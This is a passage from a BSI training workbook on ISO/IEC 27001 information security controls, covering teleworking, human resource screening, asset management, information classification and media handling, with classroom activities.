given to the mobile devices in use but also the conditions and environment where mobile working
and teleworking are taking place, typically a users home, in order to protect information being
accessed, processed or stored. A policy needs to be developed and issued which defines the
conditions and restrictions for using teleworking. Clause 6.2.2 provides a list of considerations when
determining the appropriateness of teleworking and includes:
• Physical security of proposed site
• Communications security requirements
• Threat of unauthorised access by family and friends
• Malware protection
• Software licensing agreements
• Legal considerations
• Health and safety aspects of homeworking
Once all relevant factors have been identified and considered, guidelines, arrangements, policies and
procedures should be implemented to protect the organization’s information assets and the health
and safety of the teleworker, including:
• Provision of suitable equipment
• Definition of work permitted and hours of work
• Physical IT and communications security
• Business continuity considerations
• Revocation of authority and access rights and return of assets when teleworking is terminated
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
21
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Activity 3: Organization of information security
Purpose: Assign information security responsibilities to roles within an organization.
Duration:
15 minutes in groups
15 minutes feedback and discussion
Directions:
Using a flipchart, in groups assigned by the tutor, review both the example organization chart and a
list of organizational information security responsibilities provided over the next two pages and then
complete the tasks below. When you have completed the tasks, the tutor will facilitate a class-wide
discussion:
Part 1 – To which role or group of roles in the organization chart, does each of the four sets of
responsibilities apply?
Part 2 – Which roles from the organization chart should be members of the information security
forum?
Part 3 – From a best practice perspective. to whom in the organization chart, should the Information
security manager report?
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
22
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Responsibilities
Responsibilities 1:
• Provide visible top commitment for security
• Accountable for organization wide information security management system
• Approve corporate information security policy
• Approve organization risk appetite
Responsibilities 2:
• Determine strategic security planning
• Initiate development of security policies
• Review effectiveness of information security
• Approve resources
Responsibilities 3:
• Responsible to senior managers for day-to-day-security
• Implement security consistent with business requirements
• Ensure staff availability for security education and training
• Support incident investigations
Responsibilities 4:
• Adhere to security policies
• Keep organisation’s information confidential
• Be aware of security implications of their actions
• Report suspicious behaviour and security incidents
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
23
Legal
advisor
(external)
Information
security
forum
Executive
Copyright © 2017 BSI. All rights reserved.
Compliance
Director
HR Director
24
Internal
auditor
(vacancy)
Payroll
officer
Payroll
officer
(vacancy
)
IT Director
Learning and
development
manager
Payroll
manager
Trainer
Head of
information
security
Trainer
Web
development
manager
Develope
r
Tester
IT
operations
manager
Firewall
administrato
r (vacancy)
Database
manager
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
ISM02101ENGX v2.0 Nov 2017
Example organization chart
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
7.1 Prior to employment
Objective: To ensure that employees and contractors understand their responsibilities and are suitable
for the roles for which they are considered.
7.1.1 Screening
Background verification checks on all candidates for employment should be carried out in accordance
with relevant laws, regulations and ethics and should be proportional to the business requirements, the
classification of the information to be accessed and the perceived risks.
One of the biggest threats to information security is user error. There are many reasons why errors
occur but one way in which the number of errors can be reduced is by ensuring that users are
competent to perform the duties of the role they have been given. For users who are already employed
within the organization, errors can be reduced by implementing an ongoing training and awareness
programme. However, it is important to think about how competency can be addressed, even before a
person is offered a role. One of the ways is by conducting appropriate background screening on
applicants for different roles. Screening should be commensurate with the skills, competencies and
experience associated with the duties of a specific role. Some of these could be soft skills such as
communication skills and effective people management skills, but they could also be technical skills for
roles such as database engineers and software engineers.
There are other aspects of background screening that also need to be considered, depending upon the
type of organization, the type of role and the type of information the user will have access to. For
example, if the organization is in the finance industry or the user will have access to financial
information, especially where this relates to the movement of funds or access to the organization’s or
another’s funds or other finance related products (e.g. bank account or credit card information), then
financial background checks are likely to be beneficial. For some roles criminal records checks may be
necessary. For those individuals working in government or who will have access to government
information then security services clearance checks may need to be performed.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
25
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
In most organizations, a number of basic checks are likely to be performed including:
• ID checks
• Character references
• Residence checks
• Employment history
• Credit review/ criminal history
• Education
• Eligibility to work (for example when employing foreign workers)
Some form of screening may also be required if an individual changes role within an organization
where he or she subsequently has access to sensitive or confidential information. An appropriate
screening process also needs to be conducted for contractors.
Consideration also needs to be made for the suitability of individuals to conduct the screening and
how the process should be carried out. Any screening process needs to be conducted in accordance
with the relevant legislation and candidates need to be informed beforehand of any screening
activities.
7.1.2 Terms and conditions of employment
The contractual agreements with employees and contractors should state their and the organization’s
responsibilities for information security.
All employees and contractors need to be made aware of their responsibilities to protect the
information assets of the organization. One of the ways in which this can be achieved is through
contractual agreements, e.g. terms and conditions of employment. In general, contractual obligations
should reflect the organizations policies for information security and clearly state:
• The need to sign non-disclosure or confidentiality agreements prior to accessing and processing
confidentiality agreements
• How to handle personally identifiable information and information received from third parties
• Legal responsibilities and rights e.g. regarding data protection legislation and protecting
intellectual property rights
• Specific policies that need to be complied with, e.g. information security policy and acceptable use
policy
• Responsibilities for classification of information
• Consequences of disregarding information security responsibilities, e.g. invocation of the
organization’s disciplinary process.
Ideally, information security responsibilities need to be communicated to future employees during the
pre-employment process.
Consideration should also be given within contractual agreements to extending responsibilities for a
defined period beyond the end of employment.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
26
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
7.2 During employment
Objective: To ensure that employees and contractors are aware of and fulfil their information security
responsibilities
7.2.1 Management responsibilities
Management should require all employees and contractors to apply information security in
accordance with the established policies and procedures of the organization.
In 6.1.1 we stated that the information security responsibilities should be defined for those roles that
could have an impact on an organization’s information security. Any line management role is one that
should be considered for inclusion within this process. Line managers have a responsibility to ensure
that any individuals (employees and contractors) reporting to them are complying with the
organization’s policies. Managers need to ensure those reporting to them are fully briefed on their
information security roles and responsibilities and what is expected of them in terms of working
practices. Management needs to ensure that employees and contractors are competent to carry out
their roles and responsibilities and ensure that any gaps are addressed through training and
education initiatives and that this process is conducted on an ongoing basis. There is also a key role
for management to play in creating a no-blame and positive climate where staff and contractors are
encouraged and motivated to suggest ways in which information security can be improved and where
incidents and ‘near misses’ are reported without fear of recrimination.
7.2.2 Information security awareness, education and training
All employees of the organization and, where relevant, contractors should receive appropriate
awareness education and training and regular updates in organizational policies and procedures, as
relevant for their job function.
As stated previously, user error is one of the biggest threats to information security and that lack of
competence is a major cause of information security breaches. It is not surprising that
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
27
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
information security education and training is widely regarded as the one of the most effective security
measures and controls. All users within the organization should receive a level of training appropriate to
the level of impact they could have on information security. Many organizations follow a two stage
approach to training.
The first stage is where all users undertake a base level of training (often delivered through e-learning
mechanisms) where all users within the organization receive training on high level policies, rules,
obligations and controls/ measures that apply to everyone. Such common security procedures should
include password security, malware controls, preventing tailgating, handling visitors, maintaining clear
desks and clear screens, understanding information classification, etc. All staff need to be aware of
their accountability for their actions and inactions and the consequences to both them individually and
to the organization of any of not protecting information adequately. All users also need to be aware of
what to do in the event of incidents occurring and where they can go for advice and guidance.
The second stage is to identify those users who need more specialist knowledge and training, e.g.
Windows administrators or systems engineers who need a certain level of skill to ensure that the
systems they are responsible for are adequately protected.
Most organizations recognize that information security training should be provided as soon as
employees or contractors join the organization. Where many organizations fall short, is in providing
ongoing and regular training updates. Regular training is required to address such factors as:
• Changes in business operations, e.g. moving premises, introducing new business processes which
represent new information security risks.
• Changes to the threat landscape
• Changes to technology which will also impact how information security controls are implemented
• User complacency and forgetfulness
As such, training and education should be an ongoing programme and performed no less frequently
than annually.
To get the best results, the training methodologies used should also incorporate an element of
assessment, such as a quiz or an exam at the end or at various points through the training. This will
enable the organization to identify how effective the training has been and to what level the individuals
attending the training have understood the content. This will help identify users who require further
training and identify weaknesses in the training material that needs to be addressed.
Training can be conducted internally or externally and can be general in nature or subject specific. For
example, it may be necessary to send technical staff on external vendor training courses or industry
body courses to ensure that skillsets are maintained. Training can also be formal classroom based with
a subject matter expert presenting the material, or can be conducted through team meetings or in the
office with material being presented by managers. Users should also be encouraged to do their own
research and study through reading books, magazines, posts on blog sites etc.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
28
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Certain role holders could also benefit from attending specific information security industry training
courses in order to attain a professional qualification.
Passing information security knowledge onto others can be done in more passive ways as well,
through awareness programmes. There are many ways to communicate information security
messages including:
• Poster campaigns
• Desktop calendars (information security message of the day)
• Competitions
• Newsletters
• Mouse mats
• Screensavers
7.2.3 Disciplinary process
There should be a formal and communicated disciplinary process in place to take action against
employees who have committed an information security breach.
Every organization needs to implement a formal and communicated disciplinary process to take
action against employees who have committed an information security breach. The disciplinary
process should be used as a deterrent to prevent employees from violating the organization’s
information security policies and procedures and any other information security breaches. Deliberate
breaches may require immediate actions. Naturally, the process should not be commenced without
first verifying that an information security breach has occurred (see 16.1.7).
It is essential that the disciplinary process ensures the correct and fair treatment for employees who
are suspected of committing breaches of information security. The process should provide for a
graduated response that takes into consideration factors such as the nature and gravity of the breach
and its impact on business, whether or not this is a first or repeat offence, whether or not the violator
was properly trained, relevant legislation, business contracts etc.
All information security policies should be linked to the disciplinary process and all users should be
made aware of the consequences of non-compliance.
Equally, organizations are advised to try and obtain a balance between the ‘carrot and the stick’ by
acknowledging and rewarding positive examples of good information security behaviour and working
practices.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
29
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
7.3 Termination and change of employment
Objective: To protect the organization’s interests as part of the process of changing or terminating
employment.
7.3.1 Termination or change of employment responsibilities
Information security responsibilities and duties that remain valid after termination or change of
employment should be defined, communicated to the employee or contractor and enforced.
When a person is employed by an organization, certain agreements will be made between the organization
and the individual. These could include confidentiality statements and non-disclosure agreements. They
may also include responsibilities associated with legal and regulatory compliance. Organizations should
also consider what threat to information security an individual might pose if they were to leave the
organization. Are there requirements that need to remain in force even after the person has left? These
are likely to include the above mentioned legal, regulatory and confidentiality requirements, but there
could be others too. These are known as restrictive covenants and should be documented within the
contract of employment along with the period of time they remain valid for.
Changes of responsibility or employment should be managed as the termination of the current
responsibility or employment combined with the initiation of the new responsibility or employment. There
may be responsibilities associated with the old role that need to remain in place, in terms of complying
with contractual requirements, even though the duties performed in the new role are not related. The
requirements of the new role should also be effectively communicated.
For example, if a nurse, with access to sensitive personal information of a patient moves into an
administrative role which requires no such access, the nurse is still required to keep the information they
were privy to during their nursing role confidential. Equally, the confidential elements of the new
administrative function should not be shared with colleagues from the previous role. It is also necessary to
ensure that the starters and leavers process is invoked in order to remove access to the systems and
information available to the nurse in the previous role and add those systems and information assets
related to the new role. See 9.2 for more information about access rights.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
30
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Activity 4: Human resource security
Purpose: Determine pre-employment background verification checks for different roles
Duration:
30 minutes in whole class
10 minutes feedback
Directions:
This activity involves the whole class in a tutor-led discussion (flipcharts may be used) on preemployment background/screening checks. You will have noticed that the organization chart from
Activity 3 included the following vacancies:
• Internal auditor
• Payroll officer
• Firewall administrator
As a whole group, devise a universal list of background verification checks. Then pick those that are
relevant to the vacancies listed above. When recruiting for each of these 3 roles, what background
verification checks or screening should organizations take? We have provided below a sample list of
suggested screening checks. For each role, are any of the background checks appropriate? If so,
why? Are there any missing checks you would suggest that the class considers?
Sample of background verification checks:
Identification checks
Eligibility to work in the UK checks
Financial records checks
Criminal records checks (DBS, enhanced DBS?)
Previous work history (references?)
ISM02101ENGX v2.0 Nov 2017
Interview
Security clearance required? (Counter Terrorist
Check – CTC /Security Check (SC) Developed
Vetting (DV)
Copyright © 2017 BSI. All rights reserved.
31
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
8 Asset management
Objective: To identify organizational assets and define appropriate protection responsibilities.
8.1.1 Inventory of assets
Assets associated with information and information processing facilities should be identified and an
inventory of these assets should be drawn up and maintained.
In order to ensure that information security controls are implemented in an appropriate manner, an
organization should ensure that it identifies all of the threats and vulnerabilities associated with any
information assets under its control. The first step of this process is to identify the assets. Once
identified, these assets and their associated threats and vulnerabilities need to be continually
monitored and managed. To ensure that all assets continue to be managed, it is advisable to draw up
an inventory of assets so that none are missed. The inventory itself requires ongoing management as
new assets are added and old assets are removed. The inventory of assets in some organizations
may be relatively simple and may include information such as the name of the asset, what its
function is and where it is located. Inventories in other organizations may be more complex and
include information such as asset values, associated threats, information held upon the asset (if it is a
storage device for example), serial numbers, the name of the person to whom the asset is assigned
and the classification of the information.
It is important to ensure that the inventory of assets deals with all information asset types including
the information itself, not just tangible assets such as laptops and desktops. Apart from being
accurate and up to date, it is also important that the asset inventory is consistent and aligned with
other organizational inventories.
When identifying assets, ISO/IEC 27005 can be very useful in providing examples of assets that
might need to be considered. The process of compiling an inventory of assets is an important
prerequisite and cornerstone of effective risk management.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
32
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
8.1.2 Ownership of assets
Assets maintained in the inventory should be owned.
Within the inventory of assets it is also advisable to identify the owner of the asset. The term ‘owner’
here does not necessarily mean that the individual has property rights over the asset. The term refers
to the individual who has overall responsibility for the operation and protection of the asset, from an
information security perspective.
Ownership is best assigned when assets are created or when assets are transferred to the
organization and the asset owner should be responsible for the asset over the whole of its lifecycle.
The asset owner is ideally responsible for ensuring that assets are:
• Inventoried
• Appropriately classified and protected
• Defined and periodically reviewed from an access restrictions and classification perspective
• Proper handled when they are deleted or destroyed
Routine tasks may be delegated, e.g. to a custodian looking after the assets on a daily basis, but the
responsibility remains with the owner.
In complex information systems, it may be useful to designate groups of assets which act together to
provide a particular service. In this case the owner of this service is accountable for the delivery of
the service, including the operation of its assets.
Discussion: If HR information resides within an HR database which resides on a server, which itself
resides in a data centre, which itself resides in a building and is accessed over both local and wide
area networks (the building is different from the one where the user is accessing the information
from), how many assets are there and who would be the owner of each?
8.1.3 Acceptable use of assets
Rules for the acceptable use of information and of assets associated with information and information
processing facilities should be identified, documented and implemented.
Once the assets have been identified by the organization and added to the inventory, the
organization need to decide what the asset is designed to be used for and, as importantly, what it is
not designed to be used for. The rules associated with acceptable use should be risk based, i.e. what
user behaviours in relation to specific assets represent an unacceptable risk to the organization. The
rules associated with how users should interact with an asset (and what they are and are not allowed
to use the asset for) should be drawn up into an acceptable use policy. This policy should be
communicated to all relevant users to ensure that user behaviour in relation to all assets is
appropriate and acceptable. For example, some organizations may decide that a certain level of
personal use of mobile phones, email systems and access to the internet is acceptable. Other
organizations may not.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
33
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
8.1.4 Return of assets
All employees and external party users should return all of the organizational assets in their
possession upon termination of their employment, contract or agreement.
Upon employment, organizations are likely to allocate assets to individual users. This allocation needs
to be tracked as these assets will need to be recovered if the user leaves the organization or possibly
when changing role. There are obvious assets that should be recovered when an individual leaves an
organization, such as mobile phones and laptops. Other assets may include photo ID cards, proximity
cards or fobs that allow the user to access controlled areas, two factor authentication tokens. The
user may also habitually work from home. Have they accumulated information assets at home on
paper or on local personal equipment? If so, arrangements need to be made for these to be
transferred and for the information to be securely erased from the personal equipment (see 11.2.7).
There are intangible assets as well. Where an individual or external party user has knowledge that is
important to ongoing operations, that information should be documented and transferred to the
organization.
During the notice period of termination, the organization should ensure that unauthorized copying of
relevant information (e.g. intellectual property) by terminated employees and contractors is tightly
monitored and controlled.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
34
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
8.2 Information classification
Objective: To ensure that information receives an appropriate level of protection in accordance with
its importance to the organization.
8.2.1 Classification of information
Information should be classified in terms of legal requirements, value, criticality and sensitivity to
unauthorized disclosure or modification.
Information classification should take account of business needs for sharing or restricting information,
as well as legal requirements. Assets other than information can also be classified in conformance
with the classification of information which is stored in, processed by or handled or protected by the
asset. Information should be protected appropriately in terms of the risk posed to the organization if
it were to be compromised.
As per 8.1.2 owners of information assets should be accountable for their classification.
The level of protection in the scheme should be assessed by analysing confidentiality, integrity and
availability and any other requirements for the information considered. The scheme should be aligned
to the access control policy (see 9.1.1).
Each level should be assigned a name that makes sense in the context of the classification scheme’s
application. It is paramount that the scheme is consistent across the whole organization so that
everyone will classify information and related assets in the same way, have a common understanding
of protection requirements and apply the appropriate protection. A typical commercial classification
scheme may have the following classification levels:
• Secret (disclosure has a serious impact on long term strategic objectives or puts the survival of
the organization at risk)
• Client confidential (disclosure has a significant short term impact on operations or tactical
objectives)
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
35
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
• Internal use only (disclosure causes minor embarrassment or minor operational inconvenience)
• Public (disclosure causes no harm)
The example classification scheme above is hopefully fairly self explanatory. Information with a
classification of ‘public’ would cause no impact on the organization if it were to be released into the
public domain. Information classified as ‘internal use only’ is designed to be shared among employees
of the organization, but is not designed to be made available to the general public, e.g. staff
newsletter. If it were to be released it is likely that there may be some negative consequences, but
these are not likely to cause significant harm. ‘Client confidential’ information is all about protecting the
information associated with the organization’s customers and if released could cause a breach of
contract which in turn could lead to severe penalties and a potential loss of business. Information at
the ‘secret’ level is likely to be made available to only those named individuals who need it. To share it
wider could lead to severe negative consequences for the organization.
Classification should be included in the organization’s processes, and be consistent and coherent across
the organization. Results of classification should indicate value of assets depending on their sensitivity
and criticality to the organization, e.g. in terms of not just confidentiality, but also integrity and
availability. Results of classification should be updated in accordance with changes of their value,
sensitivity and criticality through their life-cycle.
Classification provides users with a concise indication of how to handle and protect information.
Creating groups of information with similar protection needs and specifying information security
procedures that apply to all the information in each group facilitates this. This approach reduces the
need for case-by-case risk assessment and custom design of controls.
It should also be noted that information classification can vary, e.g. financial reports of a listed
company can be highly sensitive up to the formal publication date, but beyond that, the information
becomes ‘public’. These aspects should be taken into account, as over-classification can lead to the
implementation of unnecessary controls resulting in additional expense and vice versa underclassification can endanger the achievement of business objectives.
8.2.2 Labelling of information
An appropriate set of procedures for information labelling should be developed and implemented in
accordance with the information classification scheme adopted by the organization.
Once the classification scheme has been developed, the organization needs to determine how
information at different classifications is to be identified. Simple labelling would ensure that anyone
who comes across information will be able to identify its classification and thus treat it appropriately
without the need for reading the information itself. Labels should be considered for implementation
particularly when the asset is in tangible form, i.e. printed on paper or stored on CDs or on USB devices
etc. Caution should be used however, as to label an asset may also draw attention to it.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
36
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Another decision required to be taken by the organization is to what to do when an information asset is
found to not have a label. A default position should be decided upon and included within any
classification policy documentation. Some risk averse organizations may opt to treat all information that
is unlabelled as confidential or secret. However, this can lead to extensive over-classification. Other
organizations may decide that any unlabelled information should be treated as public. This gets around
the problem of having to label marketing material etc., but may lead to sensitive information being
available in the public domain. Each organization should take an approach that is best suited to its
business needs and objectives.
8.2.3 Handling of assets
Procedures for handling assets should be developed and implemented in accordance with the
information classification scheme adopted by the organization.
Procedures should be drawn up for handling, processing, storing and communicating information
consistent with its classification (see 8.2.1). A set of handling guidelines should also be produced that
define the characteristics of each classification level in terms of how the information at each level
should be treated and handled. The whole lifecycle of the information should be considered when
producing these handling guidelines, i.e. creation, storage, communication and disposal. Guidelines for
each level and for each stage in the information’s lifecycle should be determined for both electronic and
paper based information.
For example, storage of paper based ‘secret’ information may need to be stored in a locked cupboard
to which only named individuals have keys. The same information in electronic format may need to be
stored in a shred folder to which only those named individuals have access and further more, the
information may need to be encrypted. When sensitive information is disposed of, it is likely to be
either cross-cut shredded (paper) or securely wiped (electronic). Public information on the other hand
will probably not require such protection and can be disposed of with other waste products. The
electronic version of public information can be store on local drives or in public folders with no
requirement for access control or encryption and can simply be deleted when no longer required.
When drawing up handling procedures and guidelines, organizations need to consider:
•
•
•
•
•
Access restrictions supporting the protection requirements for each classification level
Maintaining a formal record of the authorized recipients of assets
Protecting temporary or permanent copies of information
Storing IT assets in accordance with manufacturers’ specifications
Clear marking of all copies of media for the attention of the authorized recipient
Care should be taken in transferring information between organizations as classifications may not be
equivalent even if the names for levels are similar. In addition, information moving between
organizations can vary in classification depending on its context in each organization, even if their
classification schemes are identical. Agreements with other organizations that include information
sharing should include procedures to identify the classification of that information and to interpret the
classification labels from other organizations.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
37
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
8.3 Media handling
Objective: To prevent unauthorized disclosure, modification, removal or destruction of information stored
on media.
8.3.1 Management of removable media
Procedures should be implemented for the management of removable media in accordance with the
classification scheme adopted by the organization.
The use of removable media should be considered carefully by all organizations. One of the attractions of
removable media such as USB sticks, portable hard drives, CDs, DVDs (i.e. small and compact nature
which is easy to transport large files) also represents a significant security threat (i.e. easy to lose and is a
perfect target for thieves). Organizations are often advised to avoid using removable media wherever
possible, but where this is not the case, ISO/IEC 27002 provides some useful guidelines for organizations
to consider in the management of removable media:
• If no longer required, the contents of any re-usable media that are to be removed from the
organization should be made unrecoverable
• Where necessary and practical, authorization should be required for media removed from the
organization and a record of such removals should be kept in order to maintain an audit trail
• All media should be stored in a safe, secure environment, in accordance with manufacturers’
specifications
• If data confidentiality or integrity are important considerations, cryptographic techniques should be
used to protect data on removable media
• To mitigate the risk of media degrading while stored data are still needed, the data should be
transferred to fresh media before becoming unreadable
• Multiple copies of valuable data should be stored on separate media to further reduce the risk of
coincidental data damage or loss
• Registration of removable media should be considered to limit the opportunity for data loss
• Removable media drives should only be enabled if there is a business reason for doing so
• Where there is a need to use removable media the transfer of information to such media should be
monitored
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
38
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
8.3.2 Disposal of media
Media should be disposed of securely when no longer required, using formal procedures.
Media used to store information will eventually get to the end of its useful life and so consideration
needs to be given to what happens to it at this point. If the information held upon the media needs
to be retained then the organization should ensure that it is copied across to new media. The old
media should then be disposed of in accordance with the requirements of the information
classification scheme and the associated handling guidelines. The procedures for secure disposal of
media containing confidential information should be proportional to the sensitivity of that information.
ISO/IEC 27002 provides a list of considerations when disposing of media:
• Media containing confidential information should be stored and disposed of securely, e.g. by
incineration or shredding, or erasure of data for use by another application within the organization
• Procedures should be in place to identify the items that might require secure disposal
• It may be easier to arrange for all media items to be collected and disposed of securely, rather
than attempting to separate out the sensitive items
• Many organizations offer collection and disposal services for media; care should be taken in
selecting a suitable external party with adequate controls and experience
• Disposal of sensitive items should be logged in order to maintain an audit trail
It should be noted that when accumulating media for disposal, consideration should be given to the
aggregation effect, which can cause a large quantity of non-sensitive information to become
sensitive.
8.3.3 Physical media transfer
Media containing information should be protected against unauthorized access, misuse or corruption
during transportation
If media is being used to transport information from one place to another then consideration should
be given to how it is transported. If the information contained on the media is confidential then there
may be a requirement for the use of a secure courier or maybe employee only face-to-face handover
to avoid any unauthorized access. When using external couriers, a list of authorized couriers needs to
be agreed with management and a procedure should be developed to verify the identification of the
couriers when media is being collected. Consideration also needs to be given to the packaging of
media in transit to protect against physical damage and environmental factors e.g. heat and
moisture.
Where sensitive information on media is not encrypted, additional compensating controls should be
considered.
Logs should also be maintained which record key details such as content, protection, transit times,
destination etc.
Note that for controls 8.3.2 and 8.3.3, paper is also considered to be media and should be
considered as part of the information classification and handling guidelines.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
39
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Activity 5: Asset management
Purpose: To identify and classify information assets.
Duration:
25 minutes pairs/groups
15 minutes feedback
Directions:
In pairs or small groups assigned by your tutor, your mission is to assist ABC Organization Ltd in
identifying its key information assets. It has never completed this exercise before and is not clear on
what constitutes an information asset. ABC Organization Ltd has asked for your help in completing
this.
